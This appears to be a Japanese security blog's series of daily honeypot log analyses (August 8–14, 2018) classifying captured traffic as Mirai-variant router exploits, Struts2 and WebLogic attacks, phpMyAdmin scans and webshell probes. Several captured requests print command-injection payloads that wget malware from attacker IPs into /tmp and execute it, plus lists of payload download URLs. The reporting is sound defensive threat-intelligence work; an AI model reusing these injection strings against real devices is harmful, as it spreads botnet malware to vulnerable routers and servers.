S-Owl

S(ecurity)Owl

ハニーポットのログ分析(2018/08/14)

WOWhoneypotの2018/08/14(火)(運用72日目)の簡易分析です。
本日の総アクセス件数は 62件です。以下が全アクセスログです。

29 2018-08-14 GET /
8 2018-08-14 GET /index.action
6 2018-08-14 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://212.237.32[.]62/k%20-O%20-%3E%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$
2 2018-08-14 GET /w00tw00t.at.blackhats.romanian.anti-sec:)
2 2018-08-14 GET /pma/scripts/setup.php
2 2018-08-14 GET /phpMyAdmin/scripts/setup.php
2 2018-08-14 GET /phpmyadmin/scripts/setup.php
2 2018-08-14 GET /MyAdmin/scripts/setup.php
2 2018-08-14 GET /myadmin/scripts/setup.php
2 2018-08-14 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://80.211.67[.]245/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$
1 2018-08-14 PROPFIND /
1 2018-08-14 POST /wls-wsat/CoordinatorPortType
1 2018-08-14 GET /sitemap.xml
1 2018-08-14 GET /robots.txt
1 2018-08-14 GET /favicon.ico

phpMyAdmin関連(10件)と/を除外したアクセス数です。

8 2018-08-14 GET /index.action
6 2018-08-14 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://212.237.32[.]62/k%20-O%20-%3E%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$
2 2018-08-14 GET /w00tw00t.at.blackhats.romanian.anti-sec:)
2 2018-08-14 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://80.211.67[.]245/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$
1 2018-08-14 POST /wls-wsat/CoordinatorPortType
1 2018-08-14 GET /sitemap.xml
1 2018-08-14 GET /robots.txt
1 2018-08-14 GET /favicon.ico 

 上から順に
Struts2脆弱性を狙った攻撃
・D-Linkの脆弱性を狙ったMirai亜種LMAO/2.0の攻撃
脆弱性スキャンツールZmEuを使ったphpMyAdminの調査行為
・D-Linkの脆弱性を狙ったMirai亜種Gemini/2.0の攻撃
Oracle Weblogic脆弱性を狙った攻撃
・サイトの構造を調査する攻撃 (×3種)

です。

Struts2を攻撃するペイロードは hxxp://222.186.153.142:26591/nodebase でした。
Weblogicを攻撃するペイロードは hxxp://121.17.28[.]15/images/test/DL.phpでした。

 

本日のハンティングログは以下です。Mirai亜種、Mirai亜種、Struts2です。

6 2018-08-14 wget hxxp://212.237.32[.]62/k
2 2018-08-14 wget hxxp://80.211.67[.]245/k
1 2018-08-14 wget hxxp://222.186.153[.]142:26591/nodebase 

 

以上です。

ハニーポットのログ分析(2018/08/13)

WOWhoneypotの2018/08/13(月)(運用71日目)の簡易分析です。
本日の総アクセス件数は 42件です。以下が全アクセスログです。

33 2018-08-13 GET /
2 2018-08-13 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://212.237.32[.]62/k%20-O%20-%3E%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$
1 2018-08-13 POST /
1 2018-08-13 GET /.well-known/security.txt
1 2018-08-13 GET /sitemap.xml
1 2018-08-13 GET /robots.txt
1 2018-08-13 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://178.128.11[.]199/qtx.mips%20-O%20-%3E%20/tmp/rz;chmod%20777%20/tmp/rz;/tmp/rz%20dlink%27$
1 2018-08-13 GET hxxp://112.35.88[.]28:10083/index.php
1 2018-08-13 GET /favicon.ico 

D-Linkの脆弱性を攻撃するMirai亜種が計3件。先日から来ているLMAO/2.0が2件とGemini/2.0と思われるもの1件です。

その他はサイトの構成を調査すると思われる通信です。

 

本日のハンティングログは以下です。

2 2018-08-13 wget hxxp://212.237.32[.]62/k
1 2018-08-13 wget hxxp://178.128.11[.]199/qtx.mips 

 

以上です。

ハニーポットのログ分析(2018/08/12)

WOWhoneypotの2018/08/12(日) (運用70日目)の簡易分析です。
本日の総アクセス件数は 89件です。以下が全アクセスログです。

37 2018-08-12 GET /index.action
29 2018-08-12 GET /
5 2018-08-12 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://212.237.32[.]62/k%20-O%20-%3E%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$
1 2018-08-12 POST /sdk
1 2018-08-12 HEAD /phpmyadmin/index.php
1 2018-08-12 HEAD /phpmyadmin/%20index.php
1 2018-08-12 HEAD /
1 2018-08-12 GET /.well-known/security.txt
1 2018-08-12 GET /sitemap.xml
1 2018-08-12 GET /robots.txt
1 2018-08-12 GET /NmapUpperCheck1534034566
1 2018-08-12 GET /NmapUpperCheck1534034565
1 2018-08-12 GET /nmaplowercheck1534034566
1 2018-08-12 GET /nmaplowercheck1534034565
1 2018-08-12 GET /Nmap/folder/check1534034566
1 2018-08-12 GET /Nmap/folder/check1534034565
1 2018-08-12 GET /manager/html
1 2018-08-12 GET /HNAP1
1 2018-08-12 GET /favicon.ico
1 2018-08-12 GET /evox/about
1 2018-08-12 GET /cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&ping_ip=google.ca%20%3B%20cd%20/tmp%3Bwget%20hxxp://178.128.11[.]199/rvs%20-O%20/tmp/rz%3Bchmod%20777%20/tmp/rz%3Bsh%20/tmp/rz%20

phpMyAdmin関連と/を除外したアクセス数です。

37 2018-08-12 GET /index.action
5 2018-08-12 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://212.237.32.62/k%20-O%20-%3E%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$
1 2018-08-12 POST /sdk
1 2018-08-12 GET /.well-known/security.txt
1 2018-08-12 GET /sitemap.xml
1 2018-08-12 GET /robots.txt
1 2018-08-12 GET /NmapUpperCheck1534034566
1 2018-08-12 GET /NmapUpperCheck1534034565
1 2018-08-12 GET /nmaplowercheck1534034566
1 2018-08-12 GET /nmaplowercheck1534034565
1 2018-08-12 GET /Nmap/folder/check1534034566
1 2018-08-12 GET /Nmap/folder/check1534034565
1 2018-08-12 GET /manager/html
1 2018-08-12 GET /HNAP1
1 2018-08-12 GET /favicon.ico
1 2018-08-12 GET /evox/about
1 2018-08-12 GET /cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&ping_ip=google.ca%20%3B%20cd%20/tmp%3Bwget%20hxxp://178.128.11[.]199/rvs%20-O%20/tmp/rz%3Bchmod%20777%20/tmp/rz%3Bsh%20/tmp/rz%20 

本日はStruts2脆弱性をつく攻撃を大量に検知しました。2つのIPからの攻撃でした。 ペイロードの配布先サイトにアクセス出来ないものもありましたが、配布していたうちの一つはDDoS用Botマルウェアの配布でした。

他、サイトの構成の調査やNMAPによるスキャンを検知しています。

また、前日から観測しているLMAO/2.0の件数は本日は多くなっています。

 

本日のハンティングログは以下です。Struts2への攻撃およびMirai亜種です。

6 2018-08-12 wget -c hxxp://wap.tfddos.net:57843/linux
5 2018-08-12 wget hxxp://212.237.32.62/k
5 2018-08-12 wget -c hxxp://111.67.194.29:32322/Manager
1 2018-08-12 wget hxxp://185.173.93.164:5555/Linux.TF
1 2018-08-12 wget hxxp://178.128.11.199/rvs 

 

以上です。

ハニーポットのログ分析(2018/08/11)

WOWhoneypotの2018/08/11(運用69日目)の簡易分析です。
本日の総アクセス件数は 27件です。以下が全アクセスログです。

19 2018-08-11 GET /
1 2018-08-11 PROPFIND /
1 2018-08-11 GET /?XDEBUG_SESSION_START=phpstorm
1 2018-08-11 GET /webdav/
1 2018-08-11 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://217.61.6.127/t%20-O%20-%3E%20/tmp/t;sh%20/tmp/t%27$
1 2018-08-11 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://212.237.32.62/k%20-O%20-%3E%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$
1 2018-08-11 GET /help.php
1 2018-08-11 GET /db_cts.php
1 2018-08-11 GET /cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&ping_ip=google.ca%20%3B%20cd%20/tmp%3Bwget%20hxxp://178.128.11.199/rvs%20-O%20/tmp/rz%3Bchmod%20777%20/tmp/rz%3Bsh%20/tmp/rz%20 

 

phpMyAdmin関連(0件)とphpに対する調査行為(2件)と/へのアクセスを除外したアクセス数です。

1 2018-08-11 GET /?XDEBUG_SESSION_START=phpstorm
1 2018-08-11 GET /webdav/
1 2018-08-11 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://217.61.6[.]127/t%20-O%20-%3E%20/tmp/t;sh%20/tmp/t%27$
1 2018-08-11 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://212.237.32[.]62/k%20-O%20-%3E%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$

1 2018-08-11 GET /cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&ping_ip=google.ca%20%3B%20cd%20/tmp%3Bwget%20hxxp://178.128.11[.]199/rvs%20-O%20/tmp/rz%3Bchmod%20777%20/tmp/rz%3Bsh%20/tmp/rz%20 

Mirai亜種が3件来ています。
うち2つはD-Linkの脆弱性を攻撃するもの、1件はZyxelルータの脆弱性を攻撃するものです。
D-Linkを狙ったものの1つは新しいUser-Agent: LMAO/2.0です。
Shinoa(Hello,World)、LMAO/2.0、Gemini/2.0(UAなし)と3種類のものが来ていることになります。

 GET /login.cgi?cli=aa%20aa%27;wget%20http://217.61.6.127/t%20-O%20-%3E%20/tmp/t;sh%20/tmp/t%27$ HTTP/1.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, World

GET /login.cgi?cli=aa%20aa%27;wget%20http://212.237.32.62/k%20-O%20-%3E%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ HTTP/1.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: /
User-Agent: LMAO/2.0

GET /cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&ping_ip=google.ca%20%3B%20cd%20/tmp%3Bwget%20http://178.128.11.199/rvs%20-O%20/tmp/rz%3Bchmod%20777%20/tmp/rz%3Bsh%20/tmp/rz%20 HTTP/1.0

 

本日のハンティングログは以下です。全てMirai亜種です。

1 2018-08-11 wget hxxp://217.61.6[.]127/t
1 2018-08-11 wget hxxp://212.237.32[.]62/k
1 2018-08-11 wget hxxp://178.128.11[.]199/rvs 

 

以上です。

ハニーポットのログ分析(2018/08/10)

WOWhoneypotの2018/08/10(金) (運用68日目)の簡易分析です。
本日の総アクセス件数は 32件です。以下が全アクセスログです。

29 2018-08-10 GET /
2 2018-08-10 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://46.166.185[.]42/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$
1 2018-08-10 GET /phpmyadmin 

phpMyAdminphpに対する調査・攻撃がないと件数が少ない日が多いですね。

本日は、
Mirai亜種のD-Linkの脆弱性を狙った攻撃が2件。
phpMyadminに関するスキャンが1件。

 

本日のハンティングログは以下です。

2 2018-08-10 wget hxxp://46.166.185[.]42/e 

 

以上です。

ハニーポットのログ分析(2018/08/09)

WOWhoneypotの2018-08-09(運用67日目)の簡易分析です。
本日の総アクセス件数は 201件です。以下が全アクセスログです。

41 2018-08-09 GET /
4 2018-08-09 POST /qq.php
3 2018-08-09 POST /qaq.php
2 2018-08-09 POST /xx.php
2 2018-08-09 POST /q.php
2 2018-08-09 GET /www/phpMyAdmin/index.php
2 2018-08-09 GET /tools/phpMyAdmin/index.php
2 2018-08-09 GET /phpMyAdmin/phpMyAdmin/index.php
2 2018-08-09 GET /phpMyAdmin/index.php
2 2018-08-09 GET /cmd.php
2 2018-08-09 GET /claroline/phpMyAdmin/index.php
2 2018-08-09 GET /admin/phpMyAdmin/index.php
1 2018-08-09 PROPFIND /
1 2018-08-09 POST /zuoshou.php
1 2018-08-09 POST /zuo.php
1 2018-08-09 POST /yumo.php
1 2018-08-09 POST /yao.php
1 2018-08-09 POST /xw.php
1 2018-08-09 POST /xw1.php
1 2018-08-09 POST /xshell.php
1 2018-08-09 POST /xiao.php
1 2018-08-09 POST /xiaomar.php
1 2018-08-09 POST /xiaoma.php
1 2018-08-09 POST /xiaomae.php
1 2018-08-09 POST /wuwu11.php
1 2018-08-09 POST /wshell.php
1 2018-08-09 POST /w.php
1 2018-08-09 POST /wp-admins.php
1 2018-08-09 POST /weixiao.php
1 2018-08-09 POST /webslee.php
1 2018-08-09 POST /wc.php
1 2018-08-09 POST /wan.php
1 2018-08-09 POST /wanan.php
1 2018-08-09 POST /test.php
1 2018-08-09 POST /system.php
1 2018-08-09 POST /ssaa.php
1 2018-08-09 POST /s.php
1 2018-08-09 POST /sheep.php
1 2018-08-09 POST /qwe.php
1 2018-08-09 POST /post.php
1 2018-08-09 POST /phpStudy.php
1 2018-08-09 POST /phpstudy.php
1 2018-08-09 POST /phpinfi.php
1 2018-08-09 POST /pe.php
1 2018-08-09 POST /mz.php
1 2018-08-09 POST /mx.php
1 2018-08-09 POST /m.php?pbid=open
1 2018-08-09 POST /min.php
1 2018-08-09 POST /log.php
1 2018-08-09 POST /lindex.php
1 2018-08-09 POST /l8.php
1 2018-08-09 POST /l7.php
1 2018-08-09 POST /ip.php
1 2018-08-09 POST /infoo.php
1 2018-08-09 POST /hm.php
1 2018-08-09 POST /hh.php
1 2018-08-09 POST /h1.php
1 2018-08-09 POST /feixiang.php
1 2018-08-09 POST /fack.php
1 2018-08-09 POST /defect.php
1 2018-08-09 POST /db_session.init.php
1 2018-08-09 POST /db.init.php
1 2018-08-09 POST /db__.init.php
1 2018-08-09 POST /db_desql.php
1 2018-08-09 POST /db_dataml.php
1 2018-08-09 POST /data.php
1 2018-08-09 POST /conflg.php
1 2018-08-09 POST /cmd.php
1 2018-08-09 POST /cainiao.php
1 2018-08-09 POST /bak.php
1 2018-08-09 POST /aw.php
1 2018-08-09 POST /aotu.php
1 2018-08-09 POST /angge.php
1 2018-08-09 POST /ak.php
1 2018-08-09 POST /ak48.php
1 2018-08-09 POST /ak47.php
1 2018-08-09 POST /9678.php
1 2018-08-09 POST /56.php
1 2018-08-09 POST /3.php
1 2018-08-09 POST /12.php
1 2018-08-09 POST /1213.php
1 2018-08-09 GET /z.php
1 2018-08-09 GET /x.php
1 2018-08-09 GET /xampp/phpmyadmin/index.php
1 2018-08-09 GET /wpo.php
1 2018-08-09 GET /wp-config.php
1 2018-08-09 GET /web/phpMyAdmin/index.php
1 2018-08-09 GET /webdav/
1 2018-08-09 GET /uploader.php
1 2018-08-09 GET /typo3/phpmyadmin/index.php
1 2018-08-09 GET /text.php
1 2018-08-09 GET /test.php
1 2018-08-09 GET /shell.php
1 2018-08-09 GET /_query.php
1 2018-08-09 GET /pmd/index.php
1 2018-08-09 GET /pma-old/index.php
1 2018-08-09 GET /pmamy/index.php
1 2018-08-09 GET /pmamy2/index.php
1 2018-08-09 GET /pma/index.php
1 2018-08-09 GET /PMA2/index.php
1 2018-08-09 GET /phpmyadmin/phpmyadmin/index.php
1 2018-08-09 GET /phpMyAdminold/index.php
1 2018-08-09 GET /phpMyAdmin.old/index.php
1 2018-08-09 GET /phpmyadmin-old/index.php
1 2018-08-09 GET /phpmyadmin/index.php
1 2018-08-09 GET /phpMyadmin_bak/index.php
1 2018-08-09 GET /phpmyadmin2/index.php
1 2018-08-09 GET /phpmyadmin1/index.php
1 2018-08-09 GET /phpmyadmin0/index.php
1 2018-08-09 GET /phpma/index.php
1 2018-08-09 GET /phpadmin/index.php
1 2018-08-09 GET /mysql/index.php
1 2018-08-09 GET /mysqladmin/index.php
1 2018-08-09 GET /mysql-admin/index.php
1 2018-08-09 GET /myadmin/index.php
1 2018-08-09 GET /myadmin2/index.php
1 2018-08-09 GET /muhstiks.php
1 2018-08-09 GET /muhstik.php
1 2018-08-09 GET /muhstik2.php
1 2018-08-09 GET /manager/html
1 2018-08-09 GET /lol.php
1 2018-08-09 GET /log.php
1 2018-08-09 GET /logon.php
1 2018-08-09 GET /license.php
1 2018-08-09 GET /lala.php
1 2018-08-09 GET /lala-dpr.php
1 2018-08-09 GET /knal.php
1 2018-08-09 GET /index.php
1 2018-08-09 GET hxxp://112.35.88.28:10083/index.php
1 2018-08-09 GET hxxp://112.35.63.31:10083/index.php
1 2018-08-09 GET /help.php
1 2018-08-09 GET /help-e.php
1 2018-08-09 GET /hell.php
1 2018-08-09 GET /desktop.ini.php
1 2018-08-09 GET /db_pma.php
1 2018-08-09 GET /db/index.php
1 2018-08-09 GET /db_cts.php
1 2018-08-09 GET /dbadmin/index.php
1 2018-08-09 GET /cmv.php
1 2018-08-09 GET /cmdd.php
1 2018-08-09 GET /appserv.php
1 2018-08-09 GET /admin/PMA/index.php
1 2018-08-09 GET /admin/pma/index.php
1 2018-08-09 GET /admin/phpmyadmin2/index.php
1 2018-08-09 GET /admin/mysql/index.php
1 2018-08-09 GET /admin/mysql2/index.php
1 2018-08-09 GET /admin/index.php 

 

phpMyAdmin関連(49件)とphpに対する調査・攻撃(109件)と/へのアクセスを除外したアクセスはありませんでした。

phpMyAdminへのアクセスとphpに対する調査・攻撃のアドレスはどちらも大半が同一のIPからのものでした。
また、phpファイルへのアクセスパスですが、よく見ると中国語と思われるファイル名が多いように思えます。zuoshou.php,xiaoma.phpなど翻訳しても意味はよくわかりませんが、中国語圏で利用されるまたは設置するファイルと思われます。

 

本日のハンティングログはありません。

以上です。

ハニーポットのログ分析(2018/08/08)

WOWhoneypotの2018/08/08(水) (運用66日目)の簡易分析です。
本日の総アクセス件数は 35件です。以下が全アクセスログです。

28 2018-08-08 GET /
1 2018-08-08 HEAD /
1 2018-08-08 GET /.well-known/security.txt
1 2018-08-08 GET /sitemap.xml
1 2018-08-08 GET /robots.txt
1 2018-08-08 GET /manager/html
1 2018-08-08 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://199.195.254[.]118/dlink%20-O%20-%3E%20/tmp/xd;sh%20/tmp/xd%27$
1 2018-08-08 GET /favicon.ico 

phpMyAdmin関連と/を除外したアクセス数です。

1 2018-08-08 GET /.well-known/security.txt
1 2018-08-08 GET /sitemap.xml
1 2018-08-08 GET /robots.txt
1 2018-08-08 GET /manager/html
1 2018-08-08 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://199.195.254[.]118/dlink%20-O%20-%3E%20/tmp/xd;sh%20/tmp/xd%27$
1 2018-08-08 GET /favicon.ico 

主にサイト構成を調査するようなアクセスのみですね…。
これが本当にハニーポットのログなのかと疑うレベルです…。

 

本日のハンティングログは以下です。Mirai亜種ですね。

1 2018-08-08 wget hxxp://199.195.254[.]118/dlink

以上です。